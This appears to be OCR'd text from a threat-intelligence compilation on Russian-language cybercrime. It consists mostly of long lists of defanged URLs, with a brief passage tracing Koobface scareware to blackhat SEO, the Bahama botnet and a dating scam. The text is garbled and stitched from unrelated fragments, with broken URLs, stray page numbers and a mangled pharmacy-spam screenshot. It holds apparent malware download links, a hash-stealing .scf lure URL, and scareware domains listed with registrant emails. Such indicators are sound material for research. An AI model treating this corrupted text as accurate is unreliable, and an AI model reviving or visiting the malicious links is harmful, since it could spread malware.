hxxp://ap.proglab.ws/dpScreen/USERcp.personaldata.jpg 
hxxp://ap.proglab.ws/dpScreen/USERcp.view.job.jpg 
hxxp://ap.proglab.ws/dpScreen/USERcp.view.msg.jpg 
hxxp://ap.proglab.ws/dpScreen/USERcp.writenewmsg.jpg 
hxxp://api.worldbank.org/v2/country/indicator/iwantyourhash.scf? prefix= 
hxxp://arddra.host.sk/ntarg.php 

hxxp://ariom.ru/forum/p201370.html 
hxxp://armas.livejournal.com/98413.html 


hxxp://arstechnica.com/news.ars/post/20081019-startup-chipmaker-hopes-to-hook 
enterprise-with-1lgbps-wifi.html 


hxxp://arstechnica.com/news.ars/post/20081028-first-look-at-windows-7.html 
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hxxp://arstechnica.com/security/2014/05/truecrypt-is-not-secure-official-sour ceforge-page- 
abruptly-warns/ 


hxxp://arstechnica.com/security/2015/06/new-exploit-turns-samsung-galaxy-phon es-into- 
remote-bugging-devices/ 


hxxp://arthur-lya.livejournal.com/ 
hxxp://articles.techrepublic.com.com/5100-10878 _11-6087480.html 
hxxp://artmaza.mazafaka.biz/molotok. gif 
hxxp://artur-lyashenko.moikrug.ru/blog/ 

hxxp://asdfgh.org/dirki.jpg 
hxxp://assets.documentcloud.org/documents/3038285/2014-Cobham-TCS-Catalog. pdf 
hxxp://atfix.com/forum/forum81.html 

hxxp://atmskimmer.com/compar10.jpg 

hxxp://auction.nic.ru/ 

hxxp://auctionguide.com/ 

hxxp://auto.lenta.ru/news/2006/04/26/eurodrink/ 
hxxp://auto.mail.ru/text.htm!l?id=25309 
hxxp://auto.mail.ru/vidview.html?id=23668 

hxxp://auto.reklama.lv 
hxxp://auto.szonline.net/szcar/wpimages/Lamborghini-Diablo-019.jpg 
hxxp://automobiles.honda.com/models/ 

hxxp://autoru2000.narod.ru/ 

hxxp://autoru2000.narod.ru/koap122002.html 
hxxp://autoru2000.narod.ru/strafnew.htm 

hxxp://av-check.com/beta 
hxxp://aviv.raffon.net/2007/03/14/PhishingUsinglE7LocalResourceVuln erability.aspx 
hxxp://aviv.raffon.net/2007/06/11/AppleSafariForWindowsOutWithACrash .aspx 


hxxp://awesomecarauctions.com/uploaded —_images/1969 %2Ochevrolet %2O0chevelle 
%20convertible-722084.jpg 


hxxp://ayguokhuru.ru/2007-02/no _smoking/ 
hxxp://aysps.gsu.edu/econ/people/gradstudents/fall03incoming/oleksiy _sharapka.jpg 
hxxp://b.foto.radikal.ru/0603/802fdbe823de.gif 

hxxp://babelfish.altavista.com/ 

hxxp://bacex.narod.ru 

hxxp://badan.ru/uploads/posts/1159985310 0510062 O.jpg 
hxxp://banda-nasty.narod.ru/banda/timati/naprosilis/a0007.jpg 
hxxp://banionwork.com/text-l.jpg 
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hxxp://bank.infomsk.ru/sibes 
hxxp://bank.open.ru 
hxxp://bank.uralsib.ru 
hxxp://bank24.ru 
hxxp://banker.org.ua/index.php?showtopic=4512 
hxxp://bankir.ru/news/newsline/11.03.2008/119175 
hxxp://bankir.ru/news/newsline/cards/18.05.2006/52934 
hxxp://bankir.ru/show/21437.gif 
hxxp://bank-klient.ru/news/news _1068.html 
hxxp://bank-test.narod.ru 
hxxp://bash.org.ru/ 
hxxp://bash.org.ru/quote.php?num=17165 
hxxp://bashkomsnabbank.ru 
hxxp://battle7.hip-hop.ru/round4/35 _hhrbattle7 _round4 _nervniy.mp3 
hxxp://belediye.nameltd.com/cgi-bin/nph-proxy.cgi/111110A/http/www.google.de/ 
hxxp://beliy.ru/private/error mama/ 
hxxp://bernardbear.com/ 
hxxp://bestfuns.org/main/svin.zip 
hxxp://bestpics.ru/full/ image001.jpg 
hxxp://betonmarket.com 
hxxp://bigfoto.ru/gallery/aloums/volodya/8 03 2006/normal _11.jpg 
hxxp://bit-player.org/2006/room-641a 
hxxp://bkovdve.com/marshals investigations most _wanted/ 
hxxp://blac.us/cp %20color.jpg 
hxxp://blackseo.com/ 
hxxp://blip.tv/file/get/Hunafacom-PodrivKafirovIMurtadovVGOVDNazran182.wmv 
hxxp://blog.chronopay.ru/?p=598 
hxxp://blog.cr4.sh 
hxxp://blog.cr4.sh/2016/06/exploring-and-exploiting-lenovo.html 
hxxp://blog.damballa.com/?p=1357 
hxxp://blog.e-gold.com/2008/07/a-new-beginning.html 
hxxp://blog.e-gold.com/2008/07/fraudulent-pres.html 
hxxp://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html 
hxxp://blog.izbirateley.net/?p=139 
hxxp://blog.lexa.ru/2007/12/25/sberbank _sdelal moj _den.html 
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hxxp://blog.lexa.ru/files/sbrf.png 


hxxp://blog.magicaltux.net/2014/03/09/mtgox-2014-hack-database-revealed-live- from-mark- 
karpeless-reddit-account/ 
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vipren. info - Email: calexing@gmail.com 
voided. info - Email: krharbou@gmail.com 
volsce. info - Email: krharbou@gmail.com 
washy. info - Email: phvandiv@gmail.com 
wincot. info - Email: enomman@gmail.com 
wiving. info - Email: enomman@gmail.com 
wooer. info - Email: jaohra@gmail.com 
xonker. info - Email: jaohra@gmail.com 


Historical OSINT of Koobface scareware activity over a period of two weeks 

The following is a snapshot of Koobface scareware activity during the last two weeks, establish- 
ing a direct connection between the Koobface botnet, the ongoing blackhat SEO campaigns, 
the Bahama botnet with scareware samples modifying HOSTS files, and an Ukrainian dating 
scam agency where the gang appears to be part of an affiliate network. 


Scareware samples pushed by Koobface, with associated detection rates: 

[40]mexcleaner .in - Email: niclas@i.ua 

[41]safetyscantool .com - 62.90.136.237 - Email: Suzanne.R.Muniz@trashymail.com 
[42]stabilitytoolsonline .com - Email: Brent.!.Purnell@pookmail.com 
[43]securitytestnetonline .com - 62.90.136.237 - Email: Dianne.T.Whitley@pookmail.com 
[44]securityprogramguide .com - Email: Kiyoko.T.Johnnson@mailinator.com 

[45 ]cheapsecurityscan .com - Email: Kevin.L.Linkous@trashymail.com 

[46]securitycheckwest .com; webbiztest .com - Email: Ruthie.R.Wilcox@mailinator.com 

[47 ]securitycodereviews .com - 62.90.136.237 - Email: Darwin.L.Mcgowan@trashymail.com 
[48]netmedtest .com - 62.90.136.237 - Email: Irene.D.Snow@trashymail.com 

[49 ]toolsdirectnow .com - Email: Frank.J.Bullard@trashymail.com 

(ratspywawe .in; wqdefender .in; pivocleaner .in; mexcleaner .in; sapesoft .in; alsoft .in; 
samosoft .in; jastaspy .in; lastspy .in; felupdate .info; inkoclear .info; dricleaner .info; 
tiposoft .info; fkupd .eu; piremover .eu; igsoft .eu; sersoft .eu) - [50]detection [51]rate 
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hxxp://wasm.ru/article.php?article=1022001 
hxxp://watchdog.ohio.gov/Portals/0/pdf/investigations/2015-CA00043.pdf 
hxxp://wazu.jp/temp/ice.rar 
hxxp://web.archive.org/web/20000325020437/hxxp://www.stockgeneration.com/ 
hxxp://web.archive.org/web/20110722212910/hxxp://vxheavens.com/ 
hxxp://web.izh.com/ sale/cat.jpg 

hxxp://web.syr.edu/ sasankar/code/triple-des.tar 
hxxp://webappsec.org/projects/statistics/ 


hxxp://webcache.googleusercontent.com/search?q=cache:kVdZz411BKs]:forum1.x akep.ru/m 
_2084348/tm.htm+ %22Icp.cc %22 &cd=47 &hl=ru &ct=clnk 


hxxp://webclient.bankintegral.ru 
hxxp://webcounterstat.info/screensavers/wallpapers gold bear _b.scr 
hxxp://webdrive. purga.ru/NS/ns/ChestniyDetektiv.avi 
hxxp://webew.ru/articles/1041.webew 
hxxp://webexhibits.org/daylightsaving/g.html 
hxxp://webfile.ru/1087231 

hxxp://webfile.ru/1087234 

hxxp://webfile.ru/1312200 

hxxp://webfile.ru/227721 

hxxp://webfile.ru/540331 

hxxp://webfile.ru/610553 
hxxp://web-hosting.candidinfo.com/free-tools-resources.asp 
hxxp://webhosting.info/webhosts/tophosts/Country/ 
hxxp://webwarper.net/ww/ GZ/www.google.de/? 
hxxp://welcome.hp.com/country/us/en/contact _us.html 
hxxp://whoer.net/ 

hxxp://wiki.mirandaim.ru/wiki/jabber vs ICQ 
hxxp://wiki.openwrt.org/ media/toh/netgear/dg834.g.v4/nftp.c 


hxxp://windowsteamblog.com/blogs/windows/7/archive/2009/05/27/introducing-th e-microsoft- 
touch-pack-for-windows-7.aspx 


hxxp://windowsupdate.microsoft.com/? 
hxxp://wi-soft.com/porno.jpg 
hxxp://wm.exchanger.ru/asp/wmlist.asp 
hxxp://wmpay.ru/images/spamtalk.jpg 
hxxp://wmperm.ru/viewpage.php?page _id=3 
hxxp://wmz-usd.ru/ 
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hxxp://wolf666.ucoz.com/index/0-15 
hxxp://wordstat.yandex.ru/advq?key= &amp 
hxxp://wordstat.yandex.ru/advq?rpt=hist &amp 
hxxp://world.guns.ru/nhandguns/hg07-r.htm 
hxxp://world.guns.ru/nhandguns/hg137-r.htm 
hxxp://world.guns.ru/nhandguns/hg155-r.htm 
hxxp://world.guns.ru/nandguns/hg20-r.htm 
hxxp://world.guns.ru/handguns/hg22-r.htm 
hxxp://worldcarding.cc/ 
hxxp://worldweapon.ru/tactics/ved.php 


hxxp://wp.internetsociety.org/ndss/wp-content/uploads/sites/25/2018/02/ndss20 18 
_Hussain _paper.pdf 


hxxp://wuestenrot.de/ 
hxxp://wumg.biz/images/1.jpg 


hxxp://ww2.tagheuer.com/ _images2005/watches/big/88c6fc909774025cc 
39955647b5fc3ea/WW2110.FC6177.jpg 


hxxp://www..daywork.com.au 

hxxp://www.003.ru/bigpic/5000-3212.jpg 
hxxp://www.1001tours.com/cgi-bin/script hotels/comments.cgi?id=16649 &amp 
hxxp://www.12dailypro.com/ 

hxxp://www. 1tv.ru/news/crime/179574 

hxxp://www. 1tv.ru/news/crime/296054 

hxxp://www. 1tv.ru/news/n103887 

hxxp://www. 1tv.ru/news/n104710 

hxxp://www. 1tv.ru/news/techno/295868 

hxxp://www. 1tv.ru/newsvideo/145819 

hxxp://www. 1tv.ru/owa/win/ort6 _main.main?p news title id=104710 &amp 
hxxp://www. 1tv.ru/owa/win/ort6 main.main?p news title id=88255 &amp 
hxxp://www. 1tv.ru/owa/win/ort6 main.main?p news title id=88279 &amp 
hxxp://www.2por.ru/sglaz.php 

hxxp://www.333-44-44.ru/shop/note _access/p... _microdrive _1gb 
hxxp://www.333-44-44.ru/shop/note _access/portable hdd/ibm _microdrive _1gb 
hxxp://www.3axogu.ru/index.php?newsid=2321:-D 

hxxp://www.455.ru 

hxxp://www.4rav.ru/images/bankir 901.jpg 

hxxp://www.4rav.ru/sys _images/bankir670.jpg 

27874 


_02A-3 


hxxp://www.4rav.ru/sys _images/bankir673.jpg 
hxxp://www.4rav.ru/sys _images/bankir674.jpg 
hxxp://www.4rav.ru/sys _images/bankir676.jpg 
hxxp://www.4rav.ru/sys _images/bankir677.jpg 
hxxp://www.4rav.ru/sys _images/bankir678.jpg 
hxxp://www.4rav.ru/sys _images/bankir679.jpg 
hxxp://www.4rav.ru/sys _images/bankir680.jpg 
hxxp://www.4rav.ru/sys _images/bankir681.jpg 
hxxp://www.4rav.ru/sys _images/bankir682.jpg 
hxxp://www.4rav.ru/sys _images/bankir688.jpg 
hxxp://www.588188.com/cgi-bin/proxy.cgi/111110A/http/www.google.de / 
hxxp://www.5o09.net/cgi-bin/printenv.pl 
hxxp://www.5-tv.ru/news/details.php?newsld=4266 
hxxp://www.770chqr.com/news/news _local.cfm?cat=7428545912 &amp 
hxxp://www.abb-bank.ru 
hxxp://www.abc.net.au/news/stories/2008/06/28/2288530.htm 
hxxp://www.abcbank.ru 
hxxp://www.abkhaziya.org/genocid.html 
hxxp://www.abl-soft.biz/bin.zip 

hxxp://www.abp.ru 

hxxp://www.abr.ru 

hxxp://www.absolutbank.com 

hxxp://www.absolutbank.ru 
hxxp://www.absolute.com/partners/our-partners.asp 
hxxp://www.absolute.com/products-bios-enabled-computers.asp 
hxxp://www.absolut-trust.ru 
hxxp://www.academic.marist.edu/mwa/vin.htm 
hxxp://www.acef-bank.ru 

hxxp://www.acropol.ru 

hxxp://www.adamon.ru 

hxxp://www.adiumx.com/ 

hxxp://www.admbank.ru 
hxxp://www.admiral-auto.ru/avtograf/subaru/ 
hxxp://www.adobe.com/2006/mxml 


hxxp://www.adobe.com/go/getair 
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hxxp://www.adobe.com/go/getflash 
hxxp://www.adobe.com/licensing/distribution 
hxxp://www.adobe.com/support/flashplayer/downloads.html #fp9 
hxxp://www.adobe.com/support/security/bulletins/apsb07-12.html 
hxxp://www.adobe.com/support/security/bulletins/apsb07-13.html 
hxxp://www.adobe.com/support/security/bulletins/apsb08-11.html 
hxxp://www.adobe.com/support/vlogit/ 
hxxp://www.advanced-armament.com/products/fullpic.asp?pic=evolution 
hxxp://www.advokat-zolotov.ru/ 
hxxp://www.adworker.ru/news/05/04/2007/11501.shtml 
hxxp://www.aenbank.ru 

hxxp://www.aeroboard.ru/ 

hxxp://www.afbank.ru 
hxxp://www.agnitum.ru/news/2008-03-12-Outpost-Antivirus-release-news.php 
hxxp://www.agressor.cc 
hxxp://www.agressor.cc/downloads/pkarda setup.exe 
hxxp://www.agressor.cc/images/imgscrl1 _0.jpg 
hxxp://www.agressor.cc/images/imgscrl1 _1.jpg 
hxxp://www.agressor.cc/images/imgscr10 _0.jpg 
hxxp://www.agressor.cc/images/imgscr11 _0.jpg 
hxxp://www.agressor.cc/images/imgscr12 _0.jpg 
hxxp://www.agressor.cc/images/imgscr2 _0.jpg 
hxxp://www.agressor.cc/images/imgscr2 _1.jpg 
hxxp://www.agressor.cc/images/imgscr3 _0.jpg 
hxxp://www.agressor.cc/images/imgscr4 _0.jpg 
hxxp://www.agressor.cc/images/imgscr5 _0.jpg 
hxxp://www.agressor.cc/images/imgscr6 _0.jpg 
hxxp://www.agressor.cc/images/imgscr7 _0.jpg 
hxxp://www.agressor.cc/images/imgscr8 _0.jpg 
hxxp://www.agressor.cc/images/imgscr9 _0.jpg 
hxxp://www.agressor.cc/module.php?act=auth &amp 
hxxp://www.agressor.cc/modules.php?0p=modl...wdownload &amp 
hxxp://www.agressor.cc/modules.php?0p=modload &amp 
hxxp://www.agroimpuls.ru 


hxxp://www.agroros.ru 
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hxxp://www.aha.ru/ landbank/ 
hxxp://www.ahbl.org/ 
hxxp://www.ahmedabad.com/cgi-bin/nph-proxy.cgi/11110/http/www.google.de/ 
hxxp://www.aibank.ru 
hxxp://www.airequipmentllc.com/Rocky _Balboa.jpg 
hxxp://www.airgunexpress.com/NEWJPEGS/304-09-1919-E.jpg 
hxxp://www.airsafe.com/flt990.htm 
hxxp://www.akbank.ru 
hxxp://www.akbapabank.narod.ru 
hxxp://www.akbars.ru 
hxxp://www.akbk.ru 
hxxp://www.akbseb.ru 
hxxp://www.akcept.ru 
hxxp://www.akcia.tpi.ru 
hxxp://www.akcia-bank.ru 
hxxp://www.akibank.ru 
hxxp://www.akko.com.ua/images/offer/mitsubishi carisma _4dr.jpg 
hxxp://www.akkobank.ru 
hxxp://www.aksonbank.ru 
hxxp://www.alal.ru 
hxxp://www.albank.ru 
hxxp://www.alefbank.ru 
hxxp://www.alertscan.net/?q=update 
hxxp://www.alexa.com/data/details/traffic _details/careermarketplace.com 
hxxp://www.alexbank.ru 
hxxp://www.alfabank.com 
hxxp://www.alfa-bank.com 
hxxp://www.alfabank.ru 
hxxp://www.alfa-bank.ru 
hxxp://www.alfadirect.ru 
hxxp://www.alfadirect.ru/reg/ 
hxxp://www.alham.net.ru/doom/index.htm 
hxxp://www.all-about-all.net 
hxxp://www.alliance-leicester.co.uk/home/index.aspx 
hxxp://www.altabank.ru 
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hxxp://www.altbank.com 

hxxp://www.altbb.com.ru 

hxxp://www.altynbank.com 
hxxp://www.alyno.ru/old-forum/viewtopic.php?p=31089 
hxxp://www.amazon.com/exec/obidos/tg/detai...e &s=pc &n=712566 


hxxp://www.amazon.com/exec/obidos/tg/detail/-/B00062091Q/002-7344932-2368060? 
v=glance &S=pc &n=712566 


hxxp://www.amibank.ru 
hxxp://www.amoose.com/cgi-bin/cgiproxy/nph-proxy.pl 
hxxp://www.andrq.org/ 

hxxp://www.anelik.ru 
hxxp://www.anfractuosity.com/projects/ultrasound-networking/ 
hxxp://www.angelfire.com/planet/capma/dumps.html 

hxxp://www.ankb.ru 

hxxp://www.annews.ru/news/detail.php?ID=157422 
hxxp://www.anonymizationservice.com/0/001/011/A/hxxp://www.google.de/ 
hxxp://www.anonymouse.org/cgi-bin/nph-aproxy.cgi/111110A/http/www.google.de/ 
hxxp://www.antalbank.ru 
hxxp://www.antgear.com/cgi-bin/nph-proxy.cgi/111110A/http/www.google.de/ 
hxxp://www.antiaverage.com/cgi-bin/nph-proxy.cgi/11110/http/www.google.de/ 
hxxp://www.antiphishing.com/ 

hxxp://www.antivirus.com/ 

hxxp://www.anyproxy.net/ 

hxxp://www.aorb.ru 

hxxp://www.apache.org/server-status 

hxxp://www.apinc.org/phpinfo. php 

hxxp://www.apkbank.ru 

hxxp://www.apple.com/DTDs/PropertyList-1.0.dtd 
hxxp://www.apple.com/safari/ 
hxxp://www.appletreeblog.com/wp-content/2008/01/zimbabwe-money.jpg 
hxxp://www.arb.ru/forums/cf/10/ 

hxxp://www.archive.org/ 

hxxp://www.aresbank.ru 

hxxp://www.aresbank-kemerovo.ru 

hxxp://www.arsenal.ru 

hxxp://www.artlebedev.ru/kovodstvo/136/bank.jpg 
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hxxp://www.asadal.co.kr 

hxxp://www.asadteam.h15.ru/ 

hxxp://www.asbank.ru 

hxxp://www.ascaniatrust.ru 

hxxp://www.ascold.smolensk.ru 

hxxp://www.asdfgh.org/super.asf 

hxxp://www.ashkadar.ru 

hxxp://www.asiainvestbank.ru 

hxxp://www.aspectbank.ru 
hxxp://www.astonmartin.com/thecars/vanquishs/specification 
hxxp://www.atb.su 

hxxp://www.atfix.com 
hxxp://www.atlantapd.org/press/03247fraudarrest.pdf 
hxxp://www.atmysports.com/ 
hxxp://www.atncorp.com/DayOptics/RifleScop...sional4x12SWATS 
hxxp://www.atncorp.com/DayOptics/RifleScopes/Professional4x12SWATS 
hxxp://www.au.sorbs.net/ 

hxxp://www.aube-escrow.com/call.jpg 

hxxp://www.auerbank.ru 
hxxp://www.authorizenet.com/agent/directory/show.php3 
hxxp://www.auto.vl.ru/pts/ 
hxxp://www.autogaleria.pl/fotografie/nyundai/hyundai santa fe 2005 O1.jpg 
hxxp://www.autointegral.ru 
hxxp://www.autojunk.nl/pix/view/133141?relevant 
hxxp://www.autoparking.topfruit.ru/bobruisk/ 
hxxp://www.autopartner.bsgv.ru 


hxxp://www.auto-parts-group.com/auto-parts-car-parts-auto-parts-catalog/image s/Lambo- 
Style-Door-Conversion-Toyota-Celica.gif) 


hxxp://www.autoreview.ru/archive/2005/24/bumping/200/01.jpg 
hxxp://www.autoreview.ru/archive/2005/24/bumping/200/02.jpg 
hxxp://www.autoreview.ru/archive/2005/24/bumping/200/03.jpg 
hxxp://www.autoreview.ru/archive/2005/24/bumping/200/04.jpg 
hxxp://www.autoreview.ru/archive/2005/24/bumping/200/09.jpg 
hxxp://www.autoreview.ru/archive/2005/24/bumping/200/11.jpg 
hxxp://www.autoreview.ru/archive/2005/24/bumping/200/14.jpg 
hxxp://www.autoreview.ru/archive/2005/24/bumping/200/15.jpg 
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hxxp://www.autosafelistblaster.com/images/dottore.jpg 
hxxp://www.autowk.ru/upload/1151047328.JPG 
hxxp://www.avangard.ru 

hxxp://www.avanturist.org/forum/ 
hxxp://www.avatarity.com/avatars/9/95/9561.jpg 
hxxp://www.aversbank.ru 

hxxp://www.aviasalon.com/ru/ 
hxxp://www.aviasalon.com/ru/programm/workplan/ 
hxxp://www.aviasalon.com/ru/visitors/roadmap/ 
hxxp://www.avtointegral.ru 
hxxp://www.avtomarket.ru/scripts/info/opinions/? model=1002 
hxxp://www.avtomarket.ru/scripts/info/opinions/? model=3301 
hxxp://www.avtomarket.ru/scripts/offers/used/?id=3048912 &amp 
hxxp://www.avtoportal.ru/journal/aid361.html 
hxxp://www.avtotorgbank.ru 

hxxp://www.avtovazbank.ru 

hxxp://www.avtoweb.com/sl hnews/nart _35315/ 
hxxp://www.awd.ru/bb/viewtopic.php?p=37093 
hxxp://www.azbank.ru 

hxxp://www.azimutbank.ru 
hxxp://www.azlyrics.com/lyrics/blondie/onewayoranother.html 
hxxp://www.babynameworld.com/russian.asp 
hxxp://www.back-to-iraq.com/archives/Files/osama.jpg 
hxxp://www. baikalinc.ru/win/prod/hguns/pm/ 

hxxp://www. baikalinc.ru/win/prod/pguns/mp654k/ 
hxxp://www.baikalinvestbank.ru 

hxxp://www. bakililar.az/lenta/?id=19524 
hxxp://www.balakovo.san.ru/ balbank 

hxxp://www.baltbank.ru 

hxxp://www.balthost.ee/ 

hxxp://www.balthost.ee/?page=2 

hxxp://www. baltica.ru 

hxxp://www.baltinvestbank.com 

hxxp://www.bank.bfa.ru 


hxxp://www.bank.rs.ru 
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hxxp://www.bank39.ru 
hxxp://www.bank45.ru 
hxxp://www.bank-45.ru 
hxxp://www.bank-alemar.ru 
hxxp://www.bank-broker.com 
hxxp://www.bankbumerang.ru 
hxxp://www.bank-cor.ru 
hxxp://www.bankd.ru 
hxxp://www.bankdolinsk.ru 
hxxp://www.bankds.ru 
hxxp://www.bankdv.ru 
hxxp://www.bank-enisey.ru 
hxxp://www.bankerbe.com 
hxxp://www.bankerbe.ru 
hxxp://www.bankermak.ru 
hxxp://www.bankeuro.ru 
hxxp://www.bankevro.ru 
hxxp://www.bankglobus.ru 
hxxp://www.bankgorod.ru 
hxxp://www.bankhaus.ru 
hxxp://www.bankhimik.ru 
hxxp://www.bank-hlynov.ru 
hxxp://www.banki.ru/services/responses/ 
hxxp://www.banki.saratova.ru 
hxxp://www.bankimperia.ru 
hxxp://www.bankintegral.ru 
hxxp://www.bankir.ru/analytics/cards/4/20214 
hxxp://www.bankirs.ru 
hxxp://www.bankirsha.com/remittances-moneygram.html 
hxxp://www.bankitb.ru 
hxxp://www.bankkaluga.ru 
hxxp://www.bank-kansky.ru 
hxxp://www.banklife.ru 
hxxp://www.bankmaxima.ru 


hxxp://www.bankmd.ru/ 
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hxxp://www.bankmib.ru 
hxxp://www.bankmrb.ru 
hxxp://www.bankmtb.ru 
hxxp://www.banknoosfera.ru 
hxxp://www.bankofcyprus.ru 
hxxp://www.bankperm.ru 
hxxp://www.bankpyatigorsk.ru 
hxxp://www.bankrazvitie.ru 
hxxp://www.bankrc.ru 
hxxp://www.bank-region.ru 
hxxp://www.bankreserv.ru 
hxxp://www.bankrh.ru 
hxxp://www.bankrs.ru 
hxxp://www.bankrsi.ru 
hxxp://www.bank-rsi.ru 
hxxp://www.bankru.ru 
hxxp://www.bankrus.ru 
hxxp://www.banksibir.ru 
hxxp://www.banksoyuZ.ru 
hxxp://www.banktc.ru 
hxxp://www.bankvl.ru 
hxxp://www.bankvympel.ru 
hxxp://www.bankzenitsochi.ru 
hxxp://www.banqueroyale.com/ 
hxxp://www.barentsbank.ru 
hxxp://www.basheconombank.ru 
hxxp://www.basmanbank.ru 
hxxp://www.bbank.ru 
hxxp://www.bbc.co.uk/news/uk-scotland-17744314 
hxxp://www.bbc.co.uk/newsbeat/30306319 
hxxp://www.bbc.co.uk/radio/d/ 
hxxp://www.bbc.co.uk/russian/society/2011/11/111109 cyber crime _usa.shtml 
hxxp://www.bbrbank.ru 
hxxp://www.bcc-msk.ru 


hxxp://www.bcosm.ru 
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What’s the deal with the historical OSINT and why wasn’t this data communicated 
away? Keep reading. 


Web images Maps Mews Sheosing Video merev Signin 


[ 


Web Results 1-0 for (0.07 seconds) 


Searches related to 
Viagra for 0.99 USD: 
Dont let the pharmacy 
arses beat you 
ya orine 
for 0.99 USD 
theusdrugs com 


Cialis for 1.99 USD 
Enhance the quality 

of your ife 

Buy Ciaks onine 

for a ow 1.99 USD 
mendrugsshop.com 


Levitra for 4.5 USD. 
Make it hard 

and make it last 
again ard again 

wath the help 

of Levitra 

The good life 

$s back! 

heathrefil. com 


Search 


Search within results | Language Toots | Search Tips | Dissatisfied? Help us improve 


Home - Advertising Programs - Business Soltiorrs - Privacy - Aboss 


The Bahama Botnet Connection 


right 


During September, the folks at ClickForensics made an interesting observation regarding 
[52]my Ukrainian "fan club" and the ad revenue stealing/click-fraud committing botnet 
Bahama - some of the scareware samples were [53]modifying the HOSTS file and presenting 
the victim with "[54]one of those cybecrime-friendly search engines" stealing revenue in the 


process. 


2792 


hxxp://www.crime-research.ru/news/10.12.2007/4056/ 
hxxp://www.crime-research.ru/news/11.02.2008/4251/ 
hxxp://www.crime-research.ru/news/11.10.2007/3906/ 
hxxp://www.crime-research.ru/news/12.02.2007/3235/ 
hxxp://www.crime-research.ru/news/12.03.2007/3308/ 
hxxp://www.crime-research.ru/news/13.05.2008/4487/ 
hxxp://www.crime-research.ru/news/14.03.2007/3314/ 
hxxp://www.crime-research.ru/news/14.03.2007/3315/ 
hxxp://www.crime-research.ru/news/15.03.2007/3316/ 
hxxp://www.crime-research.ru/news/16.02.2007/3250/ 
hxxp://www.crime-research.ru/news/17.02.2007/3251/ 
hxxp://www.crime-research.ru/news/17.04.2007/3396/ 
hxxp://www.crime-research.ru/news/19.02.2007/3253/ 
hxxp://www.crime-research.ru/news/19.02.2007/3254/ 
hxxp://www.crime-research.ru/news/19.04.2007/3403/ 
hxxp://www.crime-research.ru/news/20.07.2005/2105/ 
hxxp://www.crime-research.ru/news/22.01.2008/4195/ 
hxxp://www.crime-research.ru/news/22.03.2007/3334/ 
hxxp://www.crime-research.ru/news/23.03.2007/3336/ 
hxxp://www.crime-research.ru/news/23.10.2006/2962 
hxxp://www.crime-research.ru/news/24.03.2007/3339/ 
hxxp://www.crime-research.ru/news/24.04.2008/4451/ 
hxxp://www.crime-research.ru/news/26.04.2008/4456/ 
hxxp://www.crime-research.ru/news/27.02.2007/3274/ 
hxxp://www.crime-research.ru/news/27.02.2007/3275/ 
hxxp://www.crime-research.ru/news/28.02.2007/3278/ 
hxxp://www.crime-research.ru/news/28.02.2007/3280/ 
hxxp://www.crime-research.ru/news/28.02.2007/3283/ 
hxxp://www.crime-research.ru/news/28.03.2007/3349/ 
hxxp://www.crime-research.ru/news/29.03.2007/3351/ 
hxxp://www.crime-research.ru/news/29.08.2007/3769/:mad: 
hxxp://www.crime-research.ru/news/31.01.2007/3189/ 
hxxp://www.crime-research.ru/news/31.10.2006/2979/ 
hxxp://www.criminalistica.net/forense/modules.php:StringData 
hxxp://www.cripo.com.ua/?sect id=14 &amp 

27893 


hxxp://www.cripo.com.ua/?sect id=7 &amp 
hxxp://www.cripo.com.ua/?sect id=9 &amp 
hxxp://www.cripo.com.ua/back/gun forwomen _.jpg 
hxxp://www.cripo.com.ua/back/gun forwomen _2.jpg 
hxxp://www.cripo.com.ua/back/pytki v_millicii.jpg 
hxxp://www.cripo.com.ua/images/article/mobile predatel prw.jpg 
hxxp://www.cripo.com.ua/index.php?sect id=6 &aid=53564 
hxxp://www.cripo.com.ua/index.php?sect id=8 &aid=53781 
hxxp://www.crocusbank.ru 

hxxp://www.crosnabank.ru 
hxxp://www.crutop.nu/Vbulletin/forumdisplay.php?f=44 
hxxp://www.crutop.nu/vbulletin/showthread.php?p=572112 #post572112 
hxxp://www.crutop.nu/vbulletin/showthread.php?t=60682 &amp 
hxxp://www.crutop.nu/Vbulletin/showthread.php?t=67518 
hxxp://www.crypto.rub.de/keelog 
hxxp://www.crypto.ruhr-uni-bochum.de/en _news.html 
hxxp://www.cryptogsm.ru/ 

hxxp://www.cryptogsm.ru/gsm _interception/technical/192/ 
hxxp://www.cs.technion.ac.il 

hxxp://www.cs.utexas.edu/ shmat/shmat _ccs12.pdf 
hxxp://www.cs.utexas.edu/ shmat/shmat _oak09.pdf 
hxxp://www.custody.ru 

hxxp://www.custody.ru/en/ 
hxxp://www.cvvm.ru/modules/sections/index.php?op=viewarticle &amp 
hxxp://www.cyberlords.net/advisories/cl zend.txt 
hxxp://www.cyberplat.ru 
hxxp://www.cybersecurity.ru/upload/iblock/15b/15ba72d536885b/77ef5c044ffafe3 31c.jpg 
hxxp://www.cyberseller.ru/wellcome/good _pay.php?idd=380584 
hxxp://www.cyberspy.org/onlinetools/nph-proxy.pl 
hxxp://www.cypherpunks.ca/otr/ 
hxxp://www.dachdom.ru/upload/img482 20091222 123159.jpg 


hxxp://www.dailymail.co.uk/news/article-1229027/Millions-British-visitors-Spa in-warned- 
victims-credit-card-scam.html 


hxxp://www.dailymail.co.uk/news/article-1229027/Millions-British-visitors-Spa in-warned- 
victims-credit-card-scam.html #ixzzOXNtDqKS5 


hxxp://www.dailyredundancy.com/archives/1018.html 
27894 


hxxp://www.dailyredundancy.com/contact/legalhome.html 
hxxp://www.dalenabank.ru 

hxxp://www.dansdata.com/keyghost.htm 
hxxp://www.darkon.ru/citizenship.php 

hxxp://www.datarc.ru/news/?id=787 
hxxp://www.deadhouse.ru/news/?subaction=showfull &amp 
hxxp://www.deal-bank.ru 

hxxp://www.decodeme.com/ 
hxxp://www.deependresearch.org/2012/08/java-7-0-day-vulnerability-information .html 
hxxp://www.deependresearch.org/2012/08/java-7-vulnerability-analysis.html 
hxxp://www.dekabank.ru 


hxxp://www.delfi.ee/news/paevauudised/110 _112/fotod-kriminaalpolitsei-puistas-tartu- 
kesklinna-maja.d?id=612 70370 


hxxp://www.deltacredit.ru 
hxxp://www.dendy.hotmail.ru/Sound.mp3 
hxxp://www.dengiforum.com/showthread.php?postid=81679 
hxxp://www.dengiforum.com/showthread.php?s= &amp 


hxxp://www.dengiforum.com/showthread.php?s=0e3f25ce9bbde7 7f97496483177f28c0 
&threadid=28279 


hxxp://www.dengiforum.com/showthread.php?s=9cf2d0c9b2d667b262b7dd56 laf735db 
&threadid=28373 


hxxp://www.dengiforum.com/showthread.php?threadid=42748 
hxxp://www.denizbank.ru 
